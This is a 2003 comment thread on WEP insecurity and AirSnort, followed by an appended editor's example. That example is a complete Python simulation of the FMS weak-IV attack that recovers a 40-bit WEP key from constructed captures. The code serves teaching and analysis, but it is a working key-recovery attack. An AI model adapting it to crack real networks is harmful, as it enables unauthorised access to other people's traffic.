
  Dispelling the Myth of Wireless Security
Subject:   Wireless Security
Date:   2003-08-15 14:25:53
From:   anonymous2
Your 5-character password shows that you did not crack a WEP password but an ASCII password. If it had been 64-bit WEP it would have been 10 characters and exponentially harder to crack. If wireless is so easy to crack, why did you choose the shortest possible password to crack?

  • Wireless Security
    2003-08-16 04:02:24  trevmar

    Actually, I have found that AirSnort cracks both short and long keys in about the same amount of time (1 million to 10 million packets). The number of packets needed is more dependent on the actual code and the point in the pingflood sequence at which the AP is at any point in time (because certain regions of the WEP key space are more susceptible than others).

    I haven't really noticed any extra security from using 'clever' hex codes rather than the ASCII shorthand.

    However, Lucent changed its Orinoco firmware in September 2002 to stop its cards transmitting weak packets. I have never managed to crack an Orinoco card running up-to-date software.

    Likewise for Cisco - the LM350 series of cards are invisible when running WEP.

    But you only need one user on the network to be using a card based on the PRISM or some other chipset (eg, D-Link, Linksys, Zoom) and the whole network can be easily cracked.

    Anyway, good work Rob, an excellent explanation...

    Trevor Marshall
    • Wireless Security
      2003-11-16 14:46:05  trystano

      Hi all,

      I was intending to find a forum on this site, but haven't managed to find one :-(.

      Anyway, I have a question to ask on the security of m-commerce. I am doing an independent study that involves me researching the security measures taken when carrying out transactions over wireless networks.

      I was wondering if PKI is used as the main technology used to secure wireless transactions. Is WEP similar to this? If not, what is WEP used for?

      Can someone please assist me (if possible, direct me to some decent research).

      • Wireless Security
        2003-11-19 19:14:07  anonymous2

        You can find the best forum for wireless questions at www.netstubler.com
        Make sure to register to be able to access the full forum.

  • About WEP keys
    2003-08-15 15:11:13  rflicken

    The various key lengths quoted by manufacturers can certainly be confusing.

    The original 802.11b specification defined a 40-bit user-specified key. This key is combined with a 24-bit Initialization Vector (the IV), a random number that is part of the WEP algorithm. Together, this yields 64 bits of "key", although the IV is actually sent in the clear!

    Likewise, 104-bit WEP is used with the IV to yield 128 bits of "key". This is why user-defined ASCII keys are five characters long (5 characters times 8 bits/character == 40 bits) or thirteen characters long (13 characters times 8 bits/character == 104 bits). The user doesn't define the IV. Even when specifying long hex keys, these are simply hashed into a 40 bit or 104 bit sequence, and combined with the IV.

    Using the real-time analysis mode of AirSnort (as I did in this experiment), it doesn't try to brute-force the key space, but instead collects weak IVs that the AP transmits. Since the IVs are sent in the clear, collecting them is just a matter of observing enough traffic. The key length (40 or 104) does make some difference, but not the exponential increase in work that you might expect. From AirSnort's home page:

    "AirSnort requires approximately 5-10 million encrypted packets to be gathered. Once enough packets have been gathered, AirSnort can guess the encryption password in under a second."

    I chose to use the 40 bit (or 64 bit, if you like) WEP key for a couple of reasons. It is by far the most common WEP implementation in use, it's the only one defined by the 802.11b standard, and that's all the hardware I had on hand (at the time) would support. When I scrape together an AP and a couple of machines that will do 104 bit WEP, I'll certainly give it another run.

    I highly recommend reading any of these papers for more detail about the weaknesses of WEP than I have room to talk about here.

    Or buy my book. ;)
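
Editor's added example, illustrating the two technical posts above (rflicken's point that the RC4 seed is 24 cleartext IV bits plus the 40-bit user key, and trevmar's remark that certain regions of the key space are more susceptible): a small simulation of the FMS weak-IV attack that AirSnort's real-time mode implements. This is not code from the article, from either poster, or from AirSnort. The 5-character key "5ch4r", the simulated captures, and the small candidate search with verification at the end are constructed here; the one real-world fact it relies on is that every WEP-encrypted 802.11 data frame starts with the LLC/SNAP byte 0xAA, so the first keystream byte of every frame is known to an eavesdropper.

```python
"""Added example (not from the page or AirSnort): 40-bit WEP key layout and
FMS weak-IV key recovery, simulated offline on constructed captures."""
from collections import Counter

# First plaintext byte of every WEP-encrypted 802.11 data frame is the
# LLC/SNAP DSAP 0xAA, which is what makes the first keystream byte known.
SNAP_FIRST_BYTE = 0xAA
IV_BITS = 24


def ksa(key):
    """RC4 key scheduling; returns the permutation S."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4(key, data):
    """RC4 encrypt/decrypt (KSA + PRGA); WEP applies this to each frame."""
    S = ksa(key)
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_key_from_ascii(text):
    """5 ASCII chars -> 40-bit key, 13 -> 104-bit; the IV is never user supplied."""
    key = text.encode("ascii")
    if len(key) not in (5, 13):
        raise ValueError("WEP ASCII keys are 5 or 13 characters")
    return key


def per_packet_key(iv, secret):
    """The RC4 seed WEP really uses: 3 cleartext IV bytes || secret key."""
    return bytes(iv) + secret


def is_fms_weak_iv(iv, a):
    """Classic FMS class (A+3, 255, X): leaks secret byte number `a` about 5% of the time."""
    return iv[0] == a + 3 and iv[1] == 255


def captured_first_byte(iv, secret):
    """What a sniffer sees: first ciphertext byte of a frame sent under this IV."""
    return rc4(per_packet_key(iv, secret), bytes([SNAP_FIRST_BYTE]))[0]


def fms_vote(iv, known_secret, cipher_byte):
    """Run KSA for the A+3 known bytes (IV + recovered secret). If the state is
    'resolved', return a candidate for the next secret byte (right ~5% of the
    time), otherwise None."""
    a = len(known_secret)
    prefix = per_packet_key(iv, known_secret)
    S = list(range(256))
    j = 0
    for i in range(a + 3):
        j = (j + S[i] + prefix[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= a + 3 or (S[1] + S[S[1]]) & 0xFF != a + 3:
        return None
    z = cipher_byte ^ SNAP_FIRST_BYTE          # first keystream byte is known
    return (S.index(z) - j - S[a + 3]) & 0xFF


def fms_crack(samples, key_len=5, width=8):
    """samples: [(iv, first_cipher_byte)]. Votes byte by byte, searches the
    top `width` candidates depth-first, and verifies leaves against captures
    (the candidate search is this example's addition, not part of FMS itself)."""
    def search(secret):
        a = len(secret)
        if a == key_len:
            key = bytes(secret)
            ok = all(captured_first_byte(iv, key) == c for iv, c in samples[:16])
            return key if ok else None
        votes = Counter()
        for iv, c in samples:
            if is_fms_weak_iv(iv, a):
                guess = fms_vote(iv, bytes(secret), c)
                if guess is not None:
                    votes[guess] += 1
        for cand, _ in votes.most_common(width):
            found = search(secret + [cand])
            if found:
                return found
        return None
    return search([])


# Constructed capture: only the 1280 classic weak IVs (256 per secret byte).
# In a real trace they are ~1 in 13,000 frames, hence AirSnort's "millions of packets".
SECRET = wep_key_from_ascii("5ch4r")          # constructed key, 5 chars = 40 bits
SAMPLES = [((a + 3, 255, x), captured_first_byte((a + 3, 255, x), SECRET))
           for a in range(5) for x in range(256)]


def weak_iv_fraction(key_len=5):
    """Share of the 2^24 IV space that is classic-weak for a key of key_len bytes."""
    return key_len * 256 / 2 ** IV_BITS


if __name__ == "__main__":
    print("per-packet key:", per_packet_key((3, 255, 7), SECRET).hex())
    print("recovered:", fms_crack(SAMPLES))
```

Two things to take from running it: the secret is recovered from about five dozen useful frames per key byte, never by enumerating the 2^40 key space, which is why the 40-versus-104-bit question matters so little here; and a 13-byte key only adds more bytes to vote on (the same loop with `key_len=13` and weak IVs (A+3, 255, X) for A up to 12), which is the linear rather than exponential growth rflicken describes. The cards trevmar mentions that stop "transmitting weak packets" simply skip IVs that `is_fms_weak_iv` would accept for any byte position.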